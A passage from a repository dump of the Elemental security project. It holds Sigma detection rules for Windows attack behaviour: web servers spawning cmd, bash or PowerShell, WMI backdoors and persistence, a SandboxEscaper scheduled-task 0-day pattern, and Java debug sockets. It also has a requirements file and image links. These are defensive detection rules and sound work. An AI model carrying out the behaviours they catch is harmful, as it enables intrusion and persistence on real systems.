7 | - attack.t1046
8 | logsource:
9 | category: process_creation
10 | product: windows
11 | detection:
12 | selection:
13 | CommandLine: '*transport=dt_socket,address=*'
14 | exclusion:
15 | - CommandLine: '*address=127.0.0.1*'
16 | - CommandLine: '*address=localhost*'
17 | condition: selection and not exclusion
18 | fields:
19 | - CommandLine
20 | - ParentCommandLine
21 | falsepositives:
22 | - unknown
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_webshell_spawn.yml:
--------------------------------------------------------------------------------
1 | title: Shells Spawned by Web Servers
2 | id: 8202070f-edeb-4d31-a010-a26c72ac5600
3 | status: experimental
4 | description: Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack
5 | author: Thomas Patzke
6 | logsource:
7 | category: process_creation
8 | product: windows
9 | detection:
10 | selection:
11 | ParentImage:
12 | - '*\w3wp.exe'
13 | - '*\httpd.exe'
14 | - '*\nginx.exe'
15 | - '*\php-cgi.exe'
16 | Image:
17 | - '*\cmd.exe'
18 | - '*\sh.exe'
19 | - '*\bash.exe'
20 | - '*\powershell.exe'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | tags:
26 | - attack.privilege_escalation
27 | - attack.persistence
28 | - attack.t1100
29 | falsepositives:
30 | - Particular web applications may spawn a shell process legitimately
31 | level: high
32 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_win10_sched_task_0day.yml:
--------------------------------------------------------------------------------
1 | title: Windows 10 scheduled task SandboxEscaper 0-day
2 | id: 931b6802-d6a6-4267-9ffa-526f57f22aaf
3 | status: experimental
4 | description: Detects Task Scheduler .job import arbitrary DACL write\par
5 | references:
6 | - https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe
7 | author: Olaf Hartong
8 | date: 2019/05/22
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image: schtasks.exe
15 | CommandLine: '*/change*/TN*/RU*/RP*'
16 | condition: selection
17 | falsepositives:
18 | - Unknown
19 | tags:
20 | - attack.privilege_escalation
21 | - attack.execution
22 | - attack.t1053
23 | - car.2013-08-001
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_wmi_backdoor_exchange_transport_agent.yml:
--------------------------------------------------------------------------------
1 | title: WMI Backdoor Exchange Transport Agent
2 | id: 797011dc-44f4-4e6f-9f10-a8ceefbe566b
3 | status: experimental
4 | description: Detects a WMi backdoor in Exchange Transport Agents via WMi event filters
5 | author: Florian Roth
6 | date: 2019/10/11
7 | references:
8 | - https://twitter.com/cglyer/status/1182389676876980224
9 | - https://twitter.com/cglyer/status/1182391019633029120
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | tags:
14 | - attack.persistence
15 | - attack.t1084
16 | detection:
17 | selection:
18 | ParentImage: '*\EdgeTransport.exe'
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: critical
23 |
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_wmi_persistence_script_event_consumer.yml:
--------------------------------------------------------------------------------
1 | title: WMI Persistence - Script Event Consumer
2 | id: ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e
3 | status: experimental
4 | description: Detects WMI script event consumers
5 | references:
6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
7 | author: Thomas Patzke
8 | date: 2018/03/07
9 | tags:
10 | - attack.execution
11 | - attack.persistence
12 | - attack.t1047
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | Image: C:\WINDOWS\system32\wbem\scrcons.exe
19 | ParentImage: C:\Windows\System32\svchost.exe
20 | condition: selection
21 | falsepositives:
22 | - Legitimate event consumers
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_wmi_spwns_powershell.yml:
--------------------------------------------------------------------------------
1 | title: WMI Spawning Windows PowerShell
2 | id: 692f0bec-83ba-4d04-af7e-e884a96059b6
3 | status: experimental
4 | description: Detects WMI spawning PowerShell
5 | references:
6 | - https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shell_spawn_susp_program.yml
7 | - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e
8 | author: Markus Neis / @Karneades
9 | date: 2019/04/03
10 | tags:
11 | - attack.execution
12 | - attack.defense_evasion
13 | - attack.t1064
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | ParentImage:
20 | - '*\wmiprvse.exe'
21 | Image:
22 | - '*\powershell.exe'
23 | condition: selection
24 | falsepositives:
25 | - AppvClient
26 | - CCM
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_workflow_compiler.yml:
--------------------------------------------------------------------------------
1 | title: Microsoft Workflow Compiler
2 | id: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d
3 | status: experimental
4 | description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
5 | tags:
6 | - attack.defense_evasion
7 | - attack.execution
8 | - attack.t1127
9 | author: Nik Seetharaman
10 | references:
11 | - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\Microsoft.Workflow.Compiler.exe'
18 | condition: selection
19 | fields:
20 | - CommandLine
21 | - ParentCommandLine
22 | falsepositives:
23 | - Legitimate MWC use (unlikely in modern enterprise environments)
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/requirements.txt:
--------------------------------------------------------------------------------
1 | antlr4-python3-runtime==4.7.2
2 | attackcti==0.2.7
3 | certifi==2019.9.11
4 | cffi==1.13.0
5 | chardet==3.0.4
6 | Django==2.2.24
7 | django-markdownx==2.0.28
8 | gitdb2==2.0.6
9 | GitPython==3.0.3
10 | idna==2.8
11 | Markdown==3.1.1
12 | numpy==1.17.2
13 | pandas==0.25.1
14 | Pillow>=6.2.2
15 | pycparser==2.19
16 | python-dateutil==2.8.0
17 | pytz==2019.2
18 | requests==2.22.0
19 | simplejson==3.16.0
20 | six==1.12.0
21 | smmap2==2.0.5
22 | sqlparse==0.3.0
23 | stix2==1.2.1
24 | stix2-patterns==1.1.0
25 | taxii2-client==0.5.0
26 | urllib3==1.26.5
27 |
--------------------------------------------------------------------------------
/images/97.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/97.png
--------------------------------------------------------------------------------
/images/Atomic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/Atomic.png
--------------------------------------------------------------------------------
/images/AtomicYaml.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/AtomicYaml.png
--------------------------------------------------------------------------------
/images/Sigma.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/Sigma.png
--------------------------------------------------------------------------------
/images/Technique.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/Technique.png
--------------------------------------------------------------------------------
/images/elementalUI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/elementalUI.png
--------------------------------------------------------------------------------